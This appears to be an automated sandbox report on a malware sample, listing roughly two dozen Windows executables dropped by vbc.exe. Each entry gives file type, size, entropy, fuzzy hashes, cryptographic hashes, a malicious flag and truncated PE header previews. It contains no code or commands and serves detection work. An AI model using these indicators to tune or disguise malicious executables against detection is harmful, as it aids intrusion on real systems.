                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1375232
Entropy (8bit):5.446081476954796
Encrypted:false
SSDEEP:12288:AnEbH0j4x7R6SvyCMPXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:AkwOtO7PsqjnhMgeiCl7G0nehbGZpbD
MD5:E12FABE0D60BF0A313E62B5196A0F16C
SHA1:8F867E15EB4F83CA3CD98D161039A69387169761
SHA-256:0972D3C331B553D5F16D844E13E395ACA080FA8171A51CB0F4F065BB7374F901
SHA-512:725C195C4310B85A0BB4CB2D002677BD3238A4E6EB4BCBF3EE03FA476CC42AE07E8817B5EB7A7BD8EB9391D4E0BBE3619A11B616106287441BFA63BF8B52C7CB
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1212416
Entropy (8bit):5.119746723452393
Encrypted:false
SSDEEP:12288:7v1vvSXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:71ysqjnhMgeiCl7G0nehbGZpbD
MD5:4E22DD47350A9D7B6F8B2F74E79CEC5C
SHA1:A7C3170575F2735A13B2A6357CC1A32FE839E6E8
SHA-256:04100007EAA015E7FF6E417A98392D83999EC8607AAE2CDE2B98B9D63FC397FC
SHA-512:4CEF5220E62D7FA0548726574A4B11980A04CF103380BFD16019455AD1C9E8172480BB5BB5DD0C039EDB3DB396119EFD032326DDFF20C9AFEE7815822EA5892F
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1375232
Entropy (8bit):5.446838504983021
Encrypted:false
SSDEEP:24576:snU/h/4K4sqjnhMgeiCl7G0nehbGZpbD:sU/VkDmg27RnWGj
MD5:8CD97C00F3234B12C83A095C155CD033
SHA1:4D8E3834488BB0536CC28F7EE4C6520C2C0837C4
SHA-256:C1E58D542671F24CD9FCA6FD7C1846837FD11B9B613F79CB92570D58893BC987
SHA-512:38153CF7ED94B3A7385705F775069BCE4B24763E4BC1FB72F4AD485CA8BED3142D4D963F426BD35DC0F479D68BD7FC2667932CA7045653368A41CEEBCC3C4F1C
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1513984
Entropy (8bit):5.483752418411204
Encrypted:false
SSDEEP:24576:ux71iBLZ05jNTmJWExDsqjnhMgeiCl7G0nehbGZpbD:uxhiHIjNgHDmg27RnWGj
MD5:65EDFAD5C93E7110D6B833389A2C6DCC
SHA1:1500CCAA66CB8001BAD6833FB2A46C1818D30779
SHA-256:818D3FFDBFF8719F69B291ECD81E4D96C218D7E1D8725606C4E50EEBD5B107C6
SHA-512:5D1FB886F902EC511170E2D19DC063C905BB7B953B756DD7EF7D98BF7A753CD9576CA43BA09B27ADF03B6F3AFAF783120870F61EDE0520BE33531E0971BDC6B6
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032909680695335
Encrypted:false
SSDEEP:12288:q3rGXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:iysqjnhMgeiCl7G0nehbGZpbD
MD5:E7A4ABEE6FD713D9DF65C1E2E399DD2B
SHA1:587D1D2A137BD0B33BFFD48DCFD6E294663F8468
SHA-256:0E56BB7B5064176C6346D4ED8C054351006F8B6764A45D55FE77306993A60FD5
SHA-512:4964EA2AE60A18EDF372A501AC5212E839FA4B81D53B8E8EAF2516E794132AA08E26ADD1ECCA1FA202DEF45DC5B64B94905C85CA45F03CF017D6202D575334AA
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1242112
Entropy (8bit):5.172697908651523
Encrypted:false
SSDEEP:12288:wYdP/FXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:1dP/FsqjnhMgeiCl7G0nehbGZpbD
MD5:34B30E2AF4ADD2928FB81BAE2326279B
SHA1:A253182AAD0B2618FFCAC9CD1CF2698E64E128B1
SHA-256:7D325B31D051009B7AD016739883AECBCD05F78B9F8920EB65158CE496C7DF62
SHA-512:902BDCB5B6498E15656CAB63B49CF6BA4E50676F1F61CF6C77035FE4925B0630911DC8336A452F3D06E70BC93BB9D890A7E7448C1F0C12D843A263AAA24EA102
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032934498644877
Encrypted:false
SSDEEP:12288:Iy5eXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:1YsqjnhMgeiCl7G0nehbGZpbD
MD5:98E9B085064D5A06FCF7DBF3C37C2F35
SHA1:55192B019C682C0454FBDBE8147971C77BA70A30
SHA-256:EC0E180ED2A192259A4E736EC58BC47DB588942C5DD75754B77BD7ADD176392A
SHA-512:A30483E78254A5C005AC225A0FDC2667C0F41F7914DA09615C20F97A2C20601D332E8B2D48C15C0138991DA6D0C1A07AC13257407691A208E927059E60E8AD4B
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.033002535646008
Encrypted:false
SSDEEP:12288:uKl2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:P0sqjnhMgeiCl7G0nehbGZpbD
MD5:C4A15AA44201BC7073D9D4A3B317E232
SHA1:FC2AB97779C003BBA135297B4BBE5043498B16BA
SHA-256:ACB94C61F97571614A0820EB857F621DDB4AF986D51DDEC281155E0875F2620F
SHA-512:8FBE97F7522C26977E3F07729305FB864C99CCB9ACA69E559776CEE98F319ABF9E14799C781A82EBC3EA3EA4110496A1EBF03BA9D31319CFCF210E8AF318CC36
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.033000943068155
Encrypted:false
SSDEEP:12288:qil2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:70sqjnhMgeiCl7G0nehbGZpbD
MD5:164AFCA90EFE5E1FEA58AE513A0E48B4
SHA1:65E5CD20B58A4F74B117F0238AE9ABB7AD21C06F
SHA-256:66C8422C5979170ED28893FAEC3C7927DAB990C0723C2B878AAE76C3FBE6698C
SHA-512:F9DCB1EAD3B80FF4BC560FEF2D00E474824CF94EC9ED38D3CDB951C8C846062B16FE59A387B844D8BAC61A773BCE14CB6681D5E5C1CDB94DB87FCB088A0D498A
Malicious:true
Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................T .......................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.03297280481134
Encrypted:false
SSDEEP:12288:gTmWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:67sqjnhMgeiCl7G0nehbGZpbD
MD5:E59D630134E88B32C6992D11CFC85DA1
SHA1:05388A3004250D344BC0B6C08DDFC44F08F0AAFC
SHA-256:74A44AD51E6E2C06E90DADC63A5C28A0759FBC6C14C14FF9E7859E3D5A3E3C7B
SHA-512:B1DF057F18D9E905649CB953A5DB54644536015F747FA946AD07459411BFD057FBAF80BC793E6E01B4DE63F8250E0403C4FA082B289E08B55973C7DFE910CF2A
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................W........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.033892827601967
Encrypted:false
SSDEEP:12288:namSXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:avsqjnhMgeiCl7G0nehbGZpbD
MD5:628B5449C309D20E951E39D9A0246055
SHA1:1D6E0A65A6B11BC8CD77B1C2D429E61B2D772234
SHA-256:A23F40D30A7513766CA1C58023E8BE052B54D659C1D0B8D959B262B96F19D1C4
SHA-512:BDCB37FB1295B7FF7095F4CD446CF174E92B26063E2D86ECD6C8F7156ADB6EB59E05A48460D72A9D24F61BE425A784AA921446CE4EB19BD12123D1D3EFB3BE52
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032947051083148
Encrypted:false
SSDEEP:12288:JQ5eXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:6AsqjnhMgeiCl7G0nehbGZpbD
MD5:6020C26D5FF8F4B795AECD215620E40D
SHA1:51ADFA5CE884FEF2C1FE670C709583767CF0C0B2
SHA-256:0A6952148C7B003532796F1490BB27A2907FFE587BFA5AE40048E07980569A42
SHA-512:BB36F98FF8F3EEC1EC7B9458B708DAF4E0699F884D4696E485059B3E5CF8658EE1F3032F1ADA18E374F9FCC756A20086214614DBC0BCC6B8775C9F2F1E72B2B7
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................M........................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.024640957579667
Encrypted:false
SSDEEP:24576:7eRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:qRVlbnXf9gPTTW7H1GXC
MD5:CAD637EB2FFD660CF3BF73B6AC5E6E68
SHA1:E0F3C86F1AEF9E7536F540C87BEAE3A54DC68A4A
SHA-256:F5A868A80D7C11483D9FE09F708F16B27FC215106FF1F6983913DA7D3B6D8EEB
SHA-512:437EEE8B7F3E875DD5D4E1EB09CB3B2CD6512419025EC9B13F227C9D49BC640B0E6E5E9FB5DD22BC3E863E0207E502A2449320A1F7596AD1ABC3E1BE7C4D5C3A
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.024537477094705
Encrypted:false
SSDEEP:24576:ehRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:QRVlbnXf9gPTTW7H1GXC
MD5:2B266884D8985902DDEACCCC1C39988B
SHA1:65ECDF9DEBC68B456495CA5D98D6FB72C9DE811E
SHA-256:5E4C3C21C5BF07C1C686ACA465DF6F16A711D6BF94123484FD661AA377471782
SHA-512:C729D8EC7736BEBED0816F09508F3E0EA50680B50A326C6BA2BA6E37569D71132F468DC78BBADA8A1B43C0611678D1F7727F2C8E6CBF61DC762295F0ADACF3B0
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................-3.......................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.024577215862778
Encrypted:false
SSDEEP:24576:ZVRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:fRVlbnXf9gPTTW7H1GXC
MD5:D68197CB7A969ABEBBDF7FA11F15C46B
SHA1:2BE9A213F2C501243E3232A3918F98C62B9B6CDD
SHA-256:C67F8A9CED2A05582C76F276FECC4181C22D37AA1EC1BFA66FDBC3ECE29CA3BF
SHA-512:BD5A05EAC90BD6E957EEE566389DAB22248BD4EB48FE72EFA5179E06D77AAE050B21D0E94E9DCA8973D672A73FF6A0167E20E14D1B6DF1791C2E8DA9370771A9
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................<>.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.024653898378948
Encrypted:false
SSDEEP:24576:meRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:TRVlbnXf9gPTTW7H1GXC
MD5:FADC2A132A30172856F6E57111C4B6B3
SHA1:7FFB8C6F05F3E8215CA92ED04F5097FF8448FD8A
SHA-256:4DF575272BABB5AE697AFED47F2A30A89FEF139A95A841E1CBC4ECDB7EF9DC14
SHA-512:6CD008277749088C770A479CEF56ACA397F6DD4D2448E35077E86A244BEB39121489F325C28E310E617A143B651F1612E16AD3205B6FBB894A219145879CBE72
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1202688
                                                                                                                                                                    Entropy (8bit):5.089835278164136
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:+7QRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:+8RVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:920C166D7A03F901C3948508994B94A4
                                                                                                                                                                    SHA1:F6E43358F2418672ABF1957BE665D45A724A2782
                                                                                                                                                                    SHA-256:D26F690006771FF640426D7FF69B2F5DD1F2F8795D6ECFACA685AC03B3109A39
                                                                                                                                                                    SHA-512:FF5F8DA9B036B3CDA780EBAB33F0115F580AB05090D48E9B7FF2BF46B11FBB354E608B78A2D118711E647B9D02D32C291874E27F8F9DD0E9C70B0610E30182AA
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1142784
                                                                                                                                                                    Entropy (8bit):5.02398565320506
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:qHRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:0RVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:DC861DFB2C0505A181FFE8C97ACD696F
                                                                                                                                                                    SHA1:231EDEFBF792B79F39433259C78C26C0F28F2F10
                                                                                                                                                                    SHA-256:A2774925DEA2B93178BA93E110836F76A341CB9924E7E6D48CA37454EABCD46D
                                                                                                                                                                    SHA-512:75C639482103F4572F1DC99EFCDCB3B18AE50F1F5C2AC131DC1C02FE8CF4B1201F196BD67AD6D739EEC389B5432896BF9CEC7AA682061DF6F60D83FE0CCCF516
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1298944
                                                                                                                                                                    Entropy (8bit):5.241338551400746
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:8i7l/3roAsRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:Xl/roAsRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:41F9423776769B73AACEEE8707FDA6C1
                                                                                                                                                                    SHA1:319D3D3DF3F80F579F15E336957ACAB2E56DF668
                                                                                                                                                                    SHA-256:7CE07079A638554E78253A5D61981F10FC6FB9B9BB73D141D13044300B6F2C57
                                                                                                                                                                    SHA-512:542B52E0E6F8E9546773BCEFCBC7665B0C394AF27CEF8A11F0C4C5D4B683C89BAC5DD0206062FEDC9B1B17DBF3D4213537598722DC8E9B27EFA2D1588072428A
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1269248
                                                                                                                                                                    Entropy (8bit):5.279098752362309
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:iNfQnYRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:osYRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:AA3D2B5DC8538715B6CCF1051E29E237
                                                                                                                                                                    SHA1:3210183293FA3B1187ECC8632FFD21D83812748B
                                                                                                                                                                    SHA-256:61D910D63432C365BA2EFA17B169CD5235C2C61B7EB44DC5B3AA304CC57587E3
                                                                                                                                                                    SHA-512:8C14227E62D40E94E72C9E1991ECE00BAE672111000F597C5C08A7DEAA5DAF7D33C6D9B18050B12402B2A928B95C67C7BC054CC6ECF02162EB33EED737E49F07
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1287680
                                                                                                                                                                    Entropy (8bit):5.294729745535157
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:XLikRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:JRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:A9A5962A33C412E772BEBB9B8F25B2BA
                                                                                                                                                                    SHA1:5BCA570BCED716483EC539DEAC5C5607BB951983
                                                                                                                                                                    SHA-256:F3057EFC46376331154E497B80C577B84A1A8C089D87FDF107109B83F329CC55
                                                                                                                                                                    SHA-512:36ECF677672368A8CD46AD720C69993290BED7639DDDF90FE973C199ECFCC02B410B2E3AE7C69437BAF7F55448D655B6C9C19E4AD16FD43875117BEF0C0ACBD1
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1287680
                                                                                                                                                                    Entropy (8bit):5.294741180860204
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:kLikRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:YRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:DDA8AD019DC9EF7DB00131460AB8C5E7
                                                                                                                                                                    SHA1:403C35483AF686C58843849275245BC86C41D37D
                                                                                                                                                                    SHA-256:BD6CB95E44694E95DEF5120C41BC6C9A3C0054DED636D1F1EF4D2D211B5C6001
                                                                                                                                                                    SHA-512:66021EF9EFA828D337655E08961A7EE5F36C571F85AD8A6E2F64B055E54DF0022872D9C718975228A09D55456BC73CB92464ACF2845B1D05D1B25B1469F6A07B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1343488
                                                                                                                                                                    Entropy (8bit):5.228133943442697
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:efkRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:efkRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:63638881E14CA9E4ABECC110EA5611C8
                                                                                                                                                                    SHA1:634D74AC60978926F2BE2C6DE4BE75742FAA5EA0
                                                                                                                                                                    SHA-256:616771D792B1263F80E1E3D67E11C4520687A4620B901D889C38D9FBF1A2A7C3
                                                                                                                                                                    SHA-512:3F7E466314D5F36C46FEA8C50243342A584C55B75C8DA9C1E16866E6D36AF59301BC8F284D0534331D04C78AB6647FB15AC1FDD9C1A0E3938176C20515205F30
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1496064
                                                                                                                                                                    Entropy (8bit):5.570607965848301
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:jbUO42i/E7RVldlnXfH9gPwCn7vOb7HHcp/CGXQp:jJ7RVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:4687D73E99FCF600C6E9DB8593BE22E1
                                                                                                                                                                    SHA1:B873A344AF3B41A881C82F61A3386D7D2EBA2C38
                                                                                                                                                                    SHA-256:0988AAC03A5F0D1B99D7330E8EF815298669C716FA8998FAD963F8F78CCBCBF8
                                                                                                                                                                    SHA-512:F498CC7DE8A5997E65756526AAEAD9B0138AB4343350DBF7FD4FAA2AA417453A1E3FA74ECC62A2A11655B04ECE6AE508BAFCDD5C6A76A34D743B16037983BCD8
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):52712960
Entropy (8bit):7.9617757487388445
Encrypted:false
SSDEEP:1572864:ALjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:sicZmsR3Lo/cnLe
MD5:A86CE03D6283A2E451A7F31436D371E4
SHA1:960EABAE4FCF6ED9A5135AB27A50A0A4DAD323E9
SHA-256:EADA9C526D86356E5B3E968C8BCE451DF5AF3104DCA99E19F2A70F077DD059EA
SHA-512:4D13468CEBA8E977D7F7F53457A03392DF253ABE41C0F26C122E14B0D69EBB9E1490A5223DCA957F0266D36809416109914F6861D376D12D8A269CE46C0FE7D5
Malicious:true
Reputation:unknown
Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.....7w$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4993536
Entropy (8bit):6.809693913594545
Encrypted:false
SSDEEP:98304:hlkkCqyDEY7+o3OBvfGVY+40ya8yS+9s/pLcRVlbnP9WXW7H6C:XkkCqaE68eV+0ynE6LcHBVH
MD5:1A67AA0CE29C84307AC30DF7524455CD
SHA1:AC78570F31CF70CF2D410007B2F33B02A8E966EF
SHA-256:D4368314B976E466C53B6229E65D8B6AC9366E108F0A7861233DAA913BDD4903
SHA-512:09E5BE5722223B9A1160CD89F7DA41DF351C47D58B1D14F81FC74E4E4E74BC882D260459A24FD3D2780CDA7730FECA744C923AB268C8B5C4077F3D1327D8FD4B
Malicious:true
Reputation:unknown
Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........:V@.[8..[8..[8.{);..[8.{)=..[8..!<..[8..!;..[8..!=..[8.\.U..[8.\.E..[8.{)<..[8.{)>..[8.{)9..[8..[9..X8..!=..[8..!1.0^8..!...[8..[...[8..!:..[8.Rich.[8.................PE..L......e..........".... ..*..Z........%......`+...@..........................pL.......L......................................=......p?.............................<.=.8...................P.:..... .+.@.............+......j=......................text.....*.......*................. ..`.rdata........+.......*.............@..@.data.........=.......=.............@....rsrc........p?......F?.............@..@.reloc........?......R?.............@...................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1168384
Entropy (8bit):5.036425509293555
Encrypted:false
SSDEEP:12288:CKGVlM41NTnXENcMduaD3aawgPwCnQ3MHv8CI4OJ1bbPHHcFb+KKqCGNpcyop/:CRVldlnXfH9gPwCn7vOb7HHcp/CGXQp
MD5:6F2476BA0507172AD45688F83058CCE0
SHA1:78D2A928E74F32C6C3AABB1274C9E2E7F80BE204
SHA-256:03DEDAF7BDD6F27BB267EA676617B15B98AFD65A22447594FD3D5773F6CC9F2A
SHA-512:9AB530906E8A1C76C736D706FCAB42D9B0A92856F7D2B572D995617894F5E23307F278976DD3269BE5A4BA9F692C2C97EE71AF9F80C2D897DD79FFC7BCAEB07B
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._...........I.....................................................................%...........Rich...........PE..L....[.d............... .F...P......`?.......`....@.....................................................................................$...........................P}..8....................i......`d..@............`......4o.......................text....E.......F.................. ..`.rdata.......`... ...J..............@..@.data................j..............@....c2r.....................................rsrc...$...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................

